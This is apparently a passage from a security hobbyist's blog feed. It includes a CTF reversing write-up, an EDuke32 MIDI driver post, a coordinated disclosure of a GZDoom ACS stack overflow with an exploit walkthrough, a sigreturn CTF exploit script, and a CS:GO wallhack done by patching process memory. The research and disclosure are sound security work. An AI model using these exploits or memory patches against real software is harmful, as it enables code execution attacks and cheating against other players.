were the competition, however, I would have done it differently. Instead of starting at main, I would have probably started at one of the functions for handling input and went backwards by checking for XREF's. I only did it this way to test out the protocol for something I had difficulty with in the past. Here are a few of the highlights. If you want to look on with me, all of the files for the challenge can be found <a href="https://github.com/DhavalKapil/ctf-writeups/tree/master/insomni-hack-18/sapeloshop">here</a>.</p> <p class="indent">The most useful part about rewriting the program in C is the malleability of text. When I was obtusely reading disassembly listings, keeping track of how values were being juggled across registers was difficult for me. But by representing these instructions in C, I can convert a few of them into an expression, comment which register they're in, and come back to use that expression later. This is more useful when the juggling spans a large number of instructions, but here's a smaller example where I still used it. The disassembly at 0x1e15 is</p> <pre><code>0x00001e15 488d8550b7ff. leaq -0x48b0(%rbp), %rax 0x00001e1c 488d90080400. leaq 0x408(%rax), %rdx 0x00001e23 488b8540b7ff. movq -0x48c0(%rbp), %rax 0x00001e2a 488d35bf0800. leaq str.User_Agent:__128, %rsi ; 0x26f0 ; "User-Agent: %128[^\r\n]\r\n" 0x00001e31 4889c7 movq %rax, %rdi 0x00001e34 b800000000 movl $0, %eax </code></pre> <p class="indent">I had previously made a variable for <code>-0x48b0(%rbp)</code> during my "arrange" step, temporarily named "local_48b0" until I figured out its usage and a better name for it. Just from these six instructions, I can tell that it's a buffer of some sort, so I started off with:</p> <pre><code class="lang-c">((void *) local_48b0); // rax </code></pre> <p>Then, I handled the pointer arithmetic in the second instruction, and the third instruction, since it replaced the value in %rax:</p> <pre><code>(void *) (((char *) (local_48b0)) + 0x408); // rdx *((uint64_t *) local_48b0); // rax </code></pre> <p class="indent">Ew. It's starting to look like some system programmer's personal Lisp dialect now. Don't worry. It's gross now, but as you understand more of the subroutine, you'll be able to declare variables in such a way that you won't need casts like these. That's where the "simplify" step comes into play.</p> <p class="indent">Also, I should mention that you don't necessarily have to reverse the chunks you came up with in a linear fashion. I saw a chunk with two calls to some <code>__errno_location</code>, which I didn't want to deal with at the time, so I just went on to the next chunk. Again, you can come back to stuff later, but this does mean you need to keep track of which chunks you've covered.</p> <p class="indent">One thing I've done in the past with this protocol is to keep a little ASCII drawing of the stack layout. It doesn't make a whole lot of sense here, since there aren't any pushes or pops that would change the size of the stack frame, but maybe you'll find it useful for 32-bit binaries.</p> <p class="indent">Oh, and one last thing. Not everything is worth adding into your decompilation. For example, if I saw a timer being set up with alarm(3), I would probably ignore it. In fact, I'd patch it out, but that's a topic for another day.</p> <p>Any questions about things I mentioned in this post, or suggestions on how to make it better? Both would be greatly appreciated. Contact info is on my <a href="http://jakob.space">homepage</a>.</p> Duke on FluidSynth http://jakob.spaceDuke+on+FluidSynth http://jakob.spaceDuke+on+FluidSynth Sat, 13 Jan 2018 21:10:03 EST <p class="indent">My first experiences with Duke Nukem 3D were with EDuke32 ages ago. This was back when I was running Windows Vista, and while my memory is a bit lacking, I swear that I had working music then. Ever since I made the switch to Linux, I haven't had working music playback in EDuke. Frustrated at the fact that my past few years of Duke 3D have been devoid of all sound besides the screams of death and Duke's trash talking, I've finally decided to troubleshoot it.</p> <p class="indent">My first hypothesis was that there was a build flag for music support, and that the binaries for EDuke in my distribution's package repository were compiled without it. This led me to look at the <a href="http://wiki.eduke32.com/wiki/Building_EDuke32_on_Linux">Linux build instructions</a>, which specifically mention an "EDUKE32_MUSIC_CMD" environment variable for specifying an external MIDI player to use. This tipped me off on the issue: my version of EDuke couldn't play MIDI. This made sense, since all of the other game sounds were working just fine. I set the TiMidity++ command-line tool as the external MIDI player, as I've had luck using TiMidity++ with Qzdoom, and it worked on the first try. This victory was short-lived, however, as the game froze the second I started up the first episode. I figured that EDuke was waiting on the TiMidity++ process to die off, which is when I decided to crack open the source code.</p> <p class="indent">The code revealed that on Linux platforms, EDuke uses SDL2_Mixer for music output. I'm mildly familiar with it; it's a wrapper around the SDL audio module, providing loaders for several sound formats such as OGG and MIDI. Unfortunately, it seems incapable of playing MIDI on my system. Some further research revealed that for MIDI playback, SDL2_Mixer can use either FluidSynth, or an internal version of TiMidity. This reminded me of an issue I had when I first installed Gzdoom on my machine: soundfonts.</p> <p class="indent">You're supposed to be able to specify a default soundfont for FluidSynth in /etc/conf.d/fluidsynth, but in my experiences with the command-line tool, this is ignored entirely. Similarly, a default soundfont can be specified in /etc/timidity++/timidity.cfg, but the only things I've used that have respected that are Qzdoom and the TiMidity++ command-line tool. Compiling SDL2_Mixer from source and forcing it to use the internal version of TiMidity has the same issue as before.</p> <p class="indent">I suspect that the reason for this is the fragmentation of TiMidity releases. SDL2_Mixer has an internal version of TiMidity. So does Qzdoom. It seems to be one of those libraries that just gets copied into version control because it's small enough, like that Vorbis decoder by RAD Game Tools. This has the consequence that it will almost never be updated, and you may have several programs using different, incompatible versions of it. In the case of Qzdoom, the copyright header in timidity.cpp is dated 1995.</p> <p class="indent">I looked at <a href="http://libtimidity.sourceforge.net/">libTiMidity</a> in hopes of debugging the issue, which is when I realized that some versions of TiMidity literally do not support specifying a default soundfont, which would explain why SDL2_Mixer is dead silent.</p> <p><img src="/img/fluidsynth_1.png" alt="This is a pretty overdue feature, guys."></p> <p class="indent">Alright, so TiMidity isn't the way to go at all, and FluidSynth has issues specifying a default soundfont via configuration files, but perhaps the FluidSynth <em>API</em> exposes a means of specifying a soundfont. Fortunately, this was easy to check as FluidSynth has the best documentation I've ever seen from a library written in C. The developer documentation is rich with examples, and one of them even involves what we're looking for. Loading a soundfont with FluidSynth turns out to be as easy as calling "fluid_synth_sfload"</p> <p class="indent">Writing a drop-in replacement for the SDL2_Mixer MIDI driver is uncomplicated because Duke3D maintains a structured API for its music drivers. There are two drivers in the source tree, currently: the original Apogee Sound System implementation (source/duke3d/src/music.cpp), and the reimplementation using SDL2_Mixer (source/duke3d/src/sdlmusic.cpp). To make things simple, we'll just replace sdlmusic.cpp and define the following routines:</p> <ul> <li>const char *MUSIC_ErrorString(int32_t ErrorNumber)</li> <li>int32_t MUSIC_Init(int32_t SoundCard, int32_t Address)</li> <li>int32_t MUSIC_Shutdown(void)</li> <li>void MUSIC_SetVolume(int32_t volume)</li> <li>int32_t MUSIC_GetVolume(void)</li> <li>void MUSIC_SetLoopFlag(int32_t loopflag)</li> <li>void MUSIC_Continue(void)</li> <li>void MUSIC_Pause(void)</li> <li>int32_t MUSIC_StopSong(void)</li> <li>int32_t MUSIC_PlaySong(char *song, int32_t loopflag)</li> <li>int32_t MUSIC_InitMidi(int32_t card, midifuncs *Funcs, int32_t Address)</li> <li>void MUSIC_Update(void)</li> </ul> <p class="indent">The names are very descriptive in this case, and the routines themselves are quite simple. Routines that return an int32_t are just returning an error code (MUSIC_Ok or MUSIC_Error), with the exception of MUSIC_GetVolume, which returns the volume on a scale of 0 to 255. In our case, most of these will be stubs. For example, MUSIC_Update and MUSIC_Continue are irrelevant for FluidSynth.</p> <p class="indent">Also, it's worth mentioning that the "song" parameter to MUSIC_PlaySong isn't a filename, it's a pointer to an in-memory version of the MIDI file. FluidSynth supports reading MIDI files from memory, but unlike SDL2_Mixer's in-memory MIDI loader, the file's size has to be explicitly specified. I dug up a <a href="https://github.com/colxi/midi-parser-js/wiki/MIDI-File-Format-Specifications">specification of the format</a> and hacked together a little routine to figure out the size. It isn't particularly important, but I wanted to mention it because it worked on the first try, which warranted some celebration.</p> <pre><code class="lang-c">char *tracks; size_t file_size; uint16_t num_tracks; tracks = song + 0x14; num_tracks = *((uint16_t *) (song + 0x10)); file_size = 0x14; // Size of the MIDI header. while (num_tracks--) { uint16_t track_size; if (!memcmp(tracks, &quot;MTrk&quot;, 4)) { break; } track_size = *((uint16_t *) (tracks + 0x04)); file_size += track_size + 0x08; tracks += track_size + 0x08; } </code></pre> <p class="indent">This all ended up being simple enough that I was able to get MIDI playback working in under an hour on a Friday night. Yeah. I had some friends who wanted to go out that night, but I stayed home and wrote a MIDI driver instead. (That isn't the real reason, I'm not that much of a loser).</p> <p>Unfortunately, because I was just hacking it together quickly, the initial implementation had a few issues:</p> <ul> <li>No error reporting (MUSIC_ErrorString just returns "Nothing to see here...")</li> <li>Doesn't use modern C++, and only loosely follows the EDuke32 code style.</li> <li>Directly includes the FluidSynth headers, which seems to be a taboo in the EDuke codebase.</li> <li>MUSIC_StopSong will shutdown and reinitialize the entire audio driver just to flush whatever's currently playing out of the player.</li> <li>Replaces sdlmusic.cpp, instead of being an independent source file that can be included at compile time.</li> <li>No volume controls</li> <li>Soundfont and audio backend are hardcoded to my system.</li> </ul> <p class="indent">The first three were quite easy to fix, and as I don't have any plans to push this upstream, they were really non-issues. The thing with MUSIC_StopSong is also kind of a non-issue, as reinitializing the audio system is the only way to flush the FluidSynth player right now. That fifth issue is also something I'm not going to deal with unless someone confronts me about getting this included upstream, because this is a lot easier to maintain as a drop-in replacement.</p> <p class="indent">Volume controls were extremely trivial to implement, as the only thing the driver has to do is expose MUSIC_SetVolume. The routine receives a number on the interval [0, 255], where 0 is the quietest, and 255 is the loudest. FluidSynth provides a "synth.gain" setting, which is essentially volume, but it instead accepts numbers on the interval [0.0, 10.0].</p> <p class="indent">The naïve approach (which is what I did the first time around) is to multiply the parameter by some scalar (10.0 / 255) to fit on the interval of [0.0, 10.0]. This was quite painful for my poor little ears. So I instead scaled the number to fit on the interval of [0.0, 1.0].</p> <p class="indent">Finally, specifying the soundfont is something I'll address in the future. My patch adds some stuff to the EDuke options menu for specifying an audio backend (alsa, pulse, etc), but I have yet to figure out how to make an option that's stored as a string.</p> <p class="indent">If you want to check out my patchset, you can view the repository <a href="https://github.com/TsarFox/duke-on-fluidsynth">here</a>, and there's a demo video <a href="https://www.youtube.com/watch?v=mxkctwRZlHo">here</a>.</p> Bad BEHAVIOR http://jakob.spaceBad+BEHAVIOR http://jakob.spaceBad+BEHAVIOR Thu, 4 Jan 2018 15:45:14 EST <p class="indent">TL;DR, I discovered a stack-smashing vulnerability in GZDoom's interpreter for ACS. As a preface, there's a tendency for whitepapers like this in the security community to be written with a somewhat condescending tone towards the product's vendor. I do not mean for any portion of this writeup to come off as degrading to the developers involved. Yes, the bug was obvious to <em>me</em>, but it was still subtle enough that it went under the radar for nearly 23 years. Most developers aren't actively thinking about this kind of attack while writing a bytecode interpreter. I have an enormous amount of respect for the development teams of both GZDoom and Zandronum, who were quick to issue a patch addressing the issue and were respectful of my wishes to release this whitepaper to the public. I'd also like to thank everyone I had the pleasure of working with during this process; it warms my heart to know that the communities behind these open-source software projects are this friendly.</p> <p class="indent">Documentation and exploit code are available <a href="https://github.com/tsarfox/bad-behavior">here</a>, which is where I would like to direct any source port maintainers. There is a good chance that your port is vulnerable, and the patch to fix it is not overly-complicated.</p> <hr> <p class="indent">It's been a little over a year and a half since my first capture-the-flag competition. In that time, I've exploited countless binaries, all simulated. Popping a shell had no impact, no consequences within the real world. Recently, though, I've experienced somewhat of a wake up call. The day has finally come that I've discovered a security-critical bug in the wild to call my own.</p> <p class="indent">The research was impromptu, motivated by a few things I noticed while working away on a map for Doom. If you want to script events in Doom, such as a boss spawning and text appearing on the screen when the player flips a switch, you use a somewhat obscure DSL called <a href="https://zdoom.org/wiki/ACS">ACS</a>. The language was designed in the 90's for Hexen, a game intended to run on MS-DOS, so the implementation is full of design decisions that seem archaic nowadays. For one, scripts are compiled ahead of time into a bytecode object, which is then stored in a map's BEHAVIOR <a href="https://zdoom.org/wiki/Lumps">lump</a>, and finally run on a stack machine that has access to the game's state.</p> <p class="indent">ACS bytecode isn't completely unfamiliar to me; I wrote a disassembler for it a while ago in an attempt to learn more about radare2's internals. Despite this, the idea that the interpreter for it might allow some foul play to go by didn't cross my mind until I was actually working with ACS on the source code level. The language is, to say the least, hacked together. The type system is extremely weak, and on a low level, the only type it understands is int. There's support for strings, but they're an index into a table in the bytecode object, which can lead to some interesting behavior. Take this valid ACS code, for example:</p> <pre><code>script 1 ENTER { print(s:"You picked the wrong house, foo'!"); // Also displays "You picked the wrong house, foo'!" print(s:0); } </code></pre> <p>String constants are casted to the index at which they are located in the string table, which means you can do math with strings - albeit a little less intuitive than string math in Javascript.</p> <pre><code>script 1 ENTER { // Displays "1" (Since that's 0 + 1) print(d:"First String" + "Second String"); } </code></pre> <p class="indent">There are a handful of other quirks, such as the fact that arguments can be omitted when you invoke a function. The fragile nature of ACS made me want to look at GZDoom's implementation to see if it would reject any code that does things it shouldn't. What I initially had in mind was pulling something out of the string table that doesn't exist, but when I cracked open the source code to look at PCD_PRINTSTRING, I noticed something a little more sinister.</p> <pre><code>case PCD_PRINTNUMBER: work.AppendFormat ("%d", STACK(1)); --sp; break; </code></pre> <p class="indent">Hm? It looks like the stack pointer is decremented without any bounds checking. This is C++, though, and it's entirely possible that this is operator overloading, so I looked at how the interpreter's stack was implemented.</p> <pre><code>FACSStack stackobj; int32_t *Stack = stackobj.buffer; int &amp;sp = stackobj.sp; </code></pre> <p class="indent">No, it isn't operator overloading. This is bad. As an adversary who can manipulate the bytecode in a BEHAVIOR lump, we have complete control over an index into a buffer. Let's take a peek at FACSStack.</p> <pre><code>struct FACSStack { int32_t buffer[STACK_SIZE]; // STACK_SIZE is 0x1000 int sp; FACSStack *next; FACSStack *prev; static FACSStack *head; FACSStack(); ~FACSStack(); }; </code></pre> <p>Take note that the stack pointer is adjacent to the buffer. That will be important in the exploit.</p> <p class="indent">Let's start with a few experiments. The first thing I did was add some debug prints to certain points in the ACS interpreter so that I could see where the stack pointer is within the program's memory map. Now we can get our hands dirty with ACS bytecode. At the time I was performing this research, I didn't know how everything in the BEHAVIOR lump contributed to the final image, so I spent about a half hour figuring out how to create a valid bytecode object by looking at different BEHAVIOR lumps in a hex editor. What I <em>should</em> have done was slowed down and looked at FBehavior::Init in p_acs.cpp, but whatever, my way worked with some trial and error. If you want to play with hand-writing ACS bytecode on your own, you can use my exploit code as a base. Just alter the "payload" array to contain the bytes you want to have run.</p> <p class="indent">Now, this is where the post is going to get a little confusing, since I have to talk about two entirely different stacks. For the remainder of this whitepaper, I'll refer to the ACS interpreter's stack as "VStack," and the GZDoom process's stack as "SStack."</p> <p class="indent">Initially, I showed off the implementation of PCD_PRINTNUMBER, but something that decrements the VStack pointer isn't desirable. Let me explain - the SStack grows downwards on x86; that is, the SStack pointer starts at a very high address and decreases as you push things onto the SStack. The VStack works in the opposite direction: as you push things onto the VStack, the VStack pointer increases. We want to traverse the SStack to the return address, which was pushed before our script began execution, so we want an opcode that increments the VStack pointer instead of one that decrements it. Fortunately, this isn't difficult to find.</p> <pre><code>case PCD_PUSHBYTE: PushToStack (*(uint8_t *)pc); pc = (int *)((uint8_t *)pc + 1); break; </code></pre> <p>Where PushToStack is a macro defined as:</p> <pre><code>#define PushToStack(a) (Stack[sp++] = (a)) </code></pre> <p class="indent">So the exploit <em>will</em> overwrite the locals in the interpreter's stack frame, but there's only really one variable we have to worry about borking, which I'll talk about in a little bit. Let's jump in and craft a BEHAVIOR lump which calls PUSHBYTE a bunch of times.</p> <p><img src="/img/bad_behavior_1.png" alt="Foiled!"></p> <p class="indent">We seem to end prematurely, which is because we hit the stack pointer. We will have to modify our exploit to step over it somehow, which we can do by overwriting the stack pointer to a value which points beyond it. Notice, however, that PUSHBYTE increments the stack pointer by a whole four bytes. When we push a byte, we're actually pushing a 4-byte integer with the high bytes all set to 0, so we can't overwrite the stack pointer one "byte" at a time. Fortunately, there is another ACS opcode, PCD_PUSHNUMBER, which pushes a full 4-byte integer.</p> <p class="indent">With some fiddling in GDB, we can find that the distance between the stack buffer and where the return address is 4122 bytes. So we actually kill two birds with one stone by smashing the stack pointer - the offset to the return address is small enough that the desired stack pointer value fits into a 4 byte word. As soon as we overwrite the stack pointer, we're at the return address. I suppose maybe we killed three birds with one stone here, since we jumped over the stack canary, too. Now we're at the fun part and can overwrite the return pointer with another call or two to PCD_PUSHNUMBER. My exploit code writes 0xdeadbeefcafebabe, for the reason that it's recognizable in a stacktrace, but theoretically you could overwrite the least significant bytes of the return address and jump somewhere in GZDoom's .text segment, bypassing ASLR.</p> <p><img src="/img/bad_behavior_2.png" alt="IP Control"></p> <p class="indent">We have complete control over the instruction pointer. Also, while I was disclosing this to the development team, we discovered that vanilla Hexen has this same arbitrary code execution vulnerability. No proof-of-concept yet.</p> <p><img src="/img/bad_behavior_3.png" alt="Vanilla Hexen Vulnerable"></p> BackdoorCTF 2017: FUNSIGNALS http://jakob.spaceBackdoorCTF+2017%3A+FUNSIGNALS http://jakob.spaceBackdoorCTF+2017%3A+FUNSIGNALS Sat, 24 Sep 2017 12:01:42 EST <p>"funsignals" was a 250 point binary exploitation challenge with 58 solves. The challenge itself was a very trivial example of sigreturn-oriented programming.</p> <p class="indent">Sigreturn-oriented programming is a means of getting values into certain registers without having to use ROP gadgets that pop values from the stack. It's a technique that relies on how UNIX-like operating systems implement signals - to quote an <a href="https://lwn.net/Articles/676803/">article from LWN on the subject</a>, "when a signal is delivered to a process, execution jumps to the designated signal handler; when the handler is done, control returns to the location where execution was interrupted. Signals are a form of software interrupt, and all of the usual interrupt-like accounting must be dealt with. In particular, before the kernel can deliver a signal, it must make a note of the current execution context, including the values stored in all of the processor registers."</p> <p class="indent">That "execution context" is quite simply a structure stored on the stack, which is colloquially known as the "sigcontext" structure and is defined in the architecture-specific headers of the Linux kernel. x86, for example is found at <a href="http://elixir.free-electrons.com/linux/latest/source/arch/x86/include/uapi/asm/sigcontext.h">arch/x86/include/uapi/asm/sigcontext.h</a>.</p> <p>We're given a small amd64 Linux binary for the challenge. Its code is only a few bytes long:</p> <pre><code>;-- _start: 0x10000000 31c0 xorl %eax, %eax 0x10000002 31ff xorl %edi, %edi 0x10000004 31d2 xorl %edx, %edx 0x10000006 b604 movb $4, %dh 0x10000008 4889e6 movq %rsp, %rsi 0x1000000b 0f05 syscall 0x1000000d 31ff xorl %edi, %edi 0x1000000f 6a0f pushq $0xf 0x10000011 58 popq %rax 0x10000012 0f05 syscall 0x10000014 cc int3 ;-- syscall: 0x10000015 0f05 syscall 0x10000017 4831ff xorq %rdi, %rdi 0x1000001a 48c7c03c0000. movq $0x3c, %rax 0x10000021 0f05 syscall </code></pre> <p>Don't be intimidated by the use of the seemingly uncommon syscall instruction, the portion before the "syscall" symbol is equivalent to the following C code.</p> <pre><code>char buf[0x400]; read(0, buf, 0x400); sigreturn(); </code></pre> <p class="indent">sigreturn(2) is a system call you never use in practice, but as we mentioned earlier, the process needs to restore the context when it returns from a signal handler. This is how it's done. sigreturn(2) essentially pops the sigcontext structure from the stack and fills the proper registers. Also, that int3 instruction should be a hint to us that we'll have to manipulate the instruction pointer, too, since the program would abort if we hit that.</p> <p class="indent">A few bytes following the binary's code is a string that sticks out like a sore thumb: "fake_flag_here_as_original_is_at_server". To get the flag, we're going to want to print out whatever's at that address, which we can do with the sys_write system call. We're going to want to load 0x01, the syscall number for sys_write, into %rax, 0x01 into %rdi for stdout, 0x10000023 into %rsi for the address of the flag we want to print, and 0x29 into %rdx for the approximate length of the flag. Once the registers are all set up, we're going to want to invoke the kernel, so we'll set %rip to 0x10000015 - where there's a syscall instruction followed by a clean exit. To load all of those registers, we will fill out a sigcontext frame containing the values.</p> <p class="indent">Now, I would highly advise against manually packing the sigcontext structure, as there are a few undocumented fields that can and will cause segmentation faults coming from seemingly nowhere. <a href="https://docs.pwntools.com/en/stable/">pwntools</a> provides the pwnlib.rop.srop package for creating sigcontext frames, and the API is simple enough to understand just from the exploit code.</p> <pre><code>#!/usr/bin/env python from pwn import * SIGCONTEXT = SigreturnFrame(arch="amd64") SIGCONTEXT.rax = 0x01 SIGCONTEXT.rdi = 0x01 SIGCONTEXT.rsi = 0x10000023 SIGCONTEXT.rdx = 0x29 SIGCONTEXT.rip = 0x10000015 proc = remote("", 9034) proc.sendline(bytes(SIGCONTEXT)) print(proc.recv()) </code></pre> <pre><code>[jakob@Epsilon funsignals]$ ./exploit.py [+] Opening connection to on port 9034: Done b'flag{W3lc0m3_T0_th3_n3w_w0rld_OF_S1gn4l5}' [*] Closed connection to port 9034 </code></pre> <p class="indent">As an aside, you typically won't have an explicit call to sigreturn(2) in the binary. Sigreturn-oriented programming is most commonly combined with ROP, where a gadget to load 0xf into %rax and a gadget to perform a syscall are used.</p> Understand Game Hacking in One Post http://jakob.spaceUnderstand+Game+Hacking+in+One+Post http://jakob.spaceUnderstand+Game+Hacking+in+One+Post Tue, 5 Sep 2017 15:06:36 EST <p class="indent">At a first glance, it might seem that game cheats like <a href="https://github.com/AimTuxOfficial/AimTux">AimTux</a> are something that could only be conjured by the most talented of reverse engineers. That was at least my initial view on it, especially since I always saw these game hackers using outlandish terms that I hadn't heard in over a year of playing in CTF's. Don't be fooled; game hacking isn't nearly as complex as its community makes it seem. In this post, I will explain the concepts in a way that is familiar to people with experience in binary exploitation and reverse engineering, but it shouldn't be too hard to understand if you lack that background.</p> <p class="indent">You want to know the secret of game hacking? Editing memory. Much can be accomplished with nothing more than a few writes to process memory. This should be unsurprising if you've used Cheat Engine, scanmem, or even the Game Genie. Memory editing, despite the fact that much is nowadays validated on the server, remains king in the cheat market. Reading and writing memory be your primitives, and I'll show you just how effective they can be by walking you through a basic wallhack for CS:GO. I choose Counter-Strike as an example, because there is a wealth of information out there, and it has an active commmunity constantly hacking on it. In case you want to go forth and do more on your own, y'know?</p> <p class="indent">First, I should explain the two methods of editing process memory. Developers of game hacks refer to the methods as "internal" and "external", where internal means a dynamic library that gets injected into the game's address space, and external means a separate process that manipulates memory by means of the operating system. <a href="https://github.com/AimTuxOfficial/AimTux">AimTux</a> is an example of an internal hack, and <a href="https://gitgud.io/vc/vcaim">vcaim</a> is an example of an external hack. We'll be writing an external cheat in this blog post. Although, if you want to learn more about writing internal cheats on Linux, <a href="https://aixxe.net/2016/09/linux-skin-changer">this blog post by Aixxe</a> is excellent.</p> <p class="indent">Next, there's some terminology that people use when talking about memory-manipulating cheats. "Offsets," and "signatures." If you've ever performed a ret2libc attack on a system with ASLR, you already know about offsets. It's just a number you add to the address at which a library was loaded to get the position of something in memory. In the case of ret2libc, you're trying to get to a function like system(3), but in the case of CS:GO hacks, you're trying to get to get something like a list of entities currently in the game. You can try to find functions, too, which we'll be doing in this post to write wallhacks, but most legit CS:GO hacks go after entity data.</p> <p class="indent">Games get updated and therefore recompiled quite often, so offsets are constantly changing. To combat this, cheat developers developed ways to scan for "signatures" in memory. That is, patterns of bytes that will reveal the offset - either by being around the desired offset, or being code that references it. If you get signatures from someone, it will probably look like "B9 ? ? ? ? 6A 00 FF 50 08 C3". Those are hexpairs, and the question marks are bytes that get ignored because they're an address or something that will likely end up changing in a future update.</p> <p class="indent">Oh yeah, probably should've mentioned why we're using offsets instead of fixed addresses. It <em>is</em> because of ASLR - a lot of CS:GO's code is stored in shared libraries. Specifically, client_client.so and engine_client.so. Where these are depends on whether you're using an amd64 or an x86 processor. Just use find(1) in the Steam directory, man.</p> <p class="indent">As a heads up, this cheat is mostly a <a href="https://aixxe.net/2017/06/kernel-game-hacking">paste I stole from Emma</a>. I didn't come up with it myself, but I thought that it was simple enough to be an example for this post.</p> <p class="indent">The way we're going to go about writing our wallhack is pretty primitive, patching the .text segment. Although we're going to do this by editing memory, not the binary on disk. In CS:GO, there's a "glow" effect that spectators have - allowing them to see the outlines of other players in gamemodes like Casual. If we can find the offset to the code that checks if we're a spectator or not and patch it, we can enable the glowing effect and see through walls.</p> <p class="indent">The glow effect is also controlled by a "cvar," which is just a client-side configuration variable. Specifically, it checks "spec_show_xray". If we open up client_client.so in radare2, we can see that that's a plain ASCII string and that there are two references to it in the .text segment.</p> <pre><code>[0x005eef60]&gt; iz~spec_show_xray vaddr=0x0135c245 paddr=0x0135c245 ordinal=3016 sz=15 len=14 section=.rodata type=ascii string=spec_show_xray [0x005eef60]&gt; iS [Sections] ... idx=11 vaddr=0x005eef60 paddr=0x005eef60 sz=13998500 vsz=13998500 perm=--r-x name=.text ... 40 sections [0x005eef60]&gt; e search.from=0x005eef60 [0x005eef60]&gt; e search.to=0x005eef60+13998500 [0x005eef60]&gt; /r 0x0135c245 [0x01348878-0x01348904] data 0x6236aa leaq str.spec_show_xray, %rsi in unknown function data 0x71817c leaq str.spec_show_xray, %rsi in unknown function </code></pre> <p>If we seek to the first one, we'll see a dissasembly listing like this</p> <pre><code>0x00623690 4c8d0de9c664. leaq 0x00c6fd80, %r9 0x00623697 b980000800 movl $0x80080, %ecx 0x0062369c 4c8d05c5fdd9. leaq 0x013c3468, %r8 ; "If set to 1, you can see player outlines and name IDs through walls - who you can see depends on your team and mode" 0x006236a3 488d159af1d3. leaq 0x01362844, %rdx ; "0" 0x006236aa 488d35948bd3. leaq 0x0135c245, %rsi ; "spec_show_xray" 0x006236b1 488d3d080df6. leaq 0x065843c0, %rdi 0x006236b8 e8c3278e00 callq 0xf05e80 </code></pre> <p class="indent">This is how cvars are "constructed" in the source engine. %rdi contains the address of the actual variable, which is at 0x065843c0. This is done so that the variable can be changed from the in-game console, if the player so desires. But what this means for us is that we can easily find the address of a cvar in memory. If we look for references to that address, we'll find a handful.</p> <pre><code>[0x006236aa]&gt; /r 0x065843c0 [0x01348782-0x01348904] data 0x6236b1 leaq 0x065843c0, %rdi in unknown function data 0x6236c3 leaq 0x065843c0, %rsi in unknown function data 0x7b7f57 movq 0x01bd5180, %rdi in unknown function data 0x7b901b movq 0x01bd5180, %rbx in unknown function data 0xc5ac60 movq 0x01bd5180, %rax in unknown function data 0xc664d4 leaq 0x065843c0, %rax in unknown function data 0xc7e86c leaq 0x065843c0, %rax in unknown function data 0xc8bc34 movq 0x01bd5180, %rax in unknown function data 0xd78699 movq 0x01bd5180, %rax in unknown function data 0xda8601 movq 0x01bd5180, %rax in unknown function data 0xda9d0f movq 0x01bd5180, %rax in unknown function data 0xe3db40 movq 0x01bd5180, %rax in unknown function </code></pre> <p class="indent">A little of trial and error, combined with looking at the <a href="https://www.unknowncheats.me/forum/counterstrike-global-offensive/212843-mac-binaries-symbols.html">OSX binaries with symbols</a>, yields that 0xc664d4 is the address that we're looking for - the function responsible for glowing.</p> <pre><code>0x00c664c0 e80be7b3ff callq 0x7a4bd0 0x00c664c5 84c0 testb %al, %al 0x00c664c7 0f84c3010000 je 0xc66690 0x00c664cd 488b3d24df91. movq 0x065843f8, %rdi ; [0x65843f8:8]=0 0x00c664d4 488d05e5de91. leaq 0x065843c0, %rax 0x00c664db 4839c7 cmpq %rax, %rdi ... </code></pre> <p class="indent">That first call is the actual check, the symbol for it in the OSX binaries is "CanSeeSpectatorOnlyTools". So if we patch the jump at 0x00c664c7, we should be able to see the glow effect as long as "spec_show_xray" is set to 1.</p> <p class="indent">This is pretty easy, since we just need to change 6 bytes. I initially considered using dd(1) for this, but it doesn't seem to like touching procfs mem files, so instead we'll edit it from a python REPL.</p> <pre><code>[jakob@Epsilon ~]$ sudo grep -i client_client.so /proc/$(pidof csgo_linux64)/maps 7f5029915000-7f502b0e4000 r-xp 00000000 08:12 41426690 csgo/bin/linux64/client_client.so 7f502b0e4000-7f502b2e4000 ---p 017cf000 08:12 41426690 csgo/bin/linux64/client_client.so 7f502b2e4000-7f502b571000 rw-p 017cf000 08:12 41426690 csgo/bin/linux64/client_client.so [jakob@Epsilon ~]$ sudo python Python 3.6.2 (default, Jul 20 2017, 03:52:27) [GCC 7.1.1 20170630] on linux Type "help", "copyright", "credits" or "license" for more information. &gt;&gt;&gt; OFF = 0x7f5029915000 + 0x00c664c7 &gt;&gt;&gt; with open("/proc/9052/mem", "wb") as mem: ... mem.seek(OFF) ... mem.write(b"\x90" * 6) ... 139982284502215 6 &gt;&gt;&gt; </code></pre> <p>And it seems to work pretty well.</p> <p><img src="/img/CSGO_Wallhacks_1.png" alt="Wallhax in Action"></p> <p class="indent">I know I didn't go into a whole lot of depth about how you would actually come up with a cheat like this, but the reality is that a lot can be figured out using some basic reverse engineering skills. You already saw how much information leakage there is from a simple string reference. There's a lot of information out there already, including the source code for the <a href="https://github.com/ValveSoftware/source-sdk-2013">Source 2013 Base</a>. I'd also recommend taking a look at the <a href="https://www.unknowncheats.me/forum/index.php">UnknownCheats</a> community if you're interested in learning more, they're (generally) helpful and quite friendly.</p> <p>Further Reading:</p> <p><a href="https://www.unknowncheats.me/forum/counterstrike-global-offensive/169923-cs-cheat-rookie-rookies.html">https://www.unknowncheats.me/forum/counterstrike-global-offensive/169923-cs-cheat-rookie-rookies.html</a></p> <p><a href="https://www.unknowncheats.me/forum/general-programming-and-reversing/133228-implement-pattern-scanning-obtain-offsets-dynamically.html">https://www.unknowncheats.me/forum/general-programming-and-reversing/133228-implement-pattern-scanning-obtain-offsets-dynamically.html</a></p> Analyzing Executable Size, part 0 - A Small, Proof-of-Concept Loader http://jakob.spaceAnalyzing+Executable+Size%2C+part+0+-+A+Small%2C+Proof-of-Concept+Loader http://jakob.spaceAnalyzing+Executable+Size%2C+part+0+-+A+Small%2C+Proof-of-Concept+Loader Mon, 31 Jul 2017 13:35:11 EST <p class="indent">It seems that static linking is back in style, or at least popular among all the hip new programming languages of today. I don't have anything against statically linked binaries, nor do I have a problem with larger executables, but I've noticed that the acceptable size for an executable is a lot larger now than it was a few years ago; that is, the new kids on the block have significantly more leeway than their predecessors. For example - a C program that spits out "hello world" is 7 KB when statically linked to musl. It's 12 KB when dynamically linked to glibc. The same program in D, where the reference compiler doesn't allow dynamic linking to the standard library, is 896 KB. A blog post I read recently about certificate chain verification in Go made a point of praising the toolchain for being able to spit out a binary that was "less than 6 MB!" I'm being more facetious than with my D example, as this was statically linked to an SSL-capable web server, but 6 MB is a little over half the size of a <a href="https://en.wikipedia.org/wiki/Tiny_Core_Linux">fully-functioning operating system</a>. I'm not so interested in why we settle binaries the size of a few videos, but instead I'd like to look at why they're that large to begin with. To peer in and see what wealth of information is stored inside, and how certain programming languages make use of that information.</p> <p class="indent">Perhaps we should first take a step back. What is a binary, anyway? 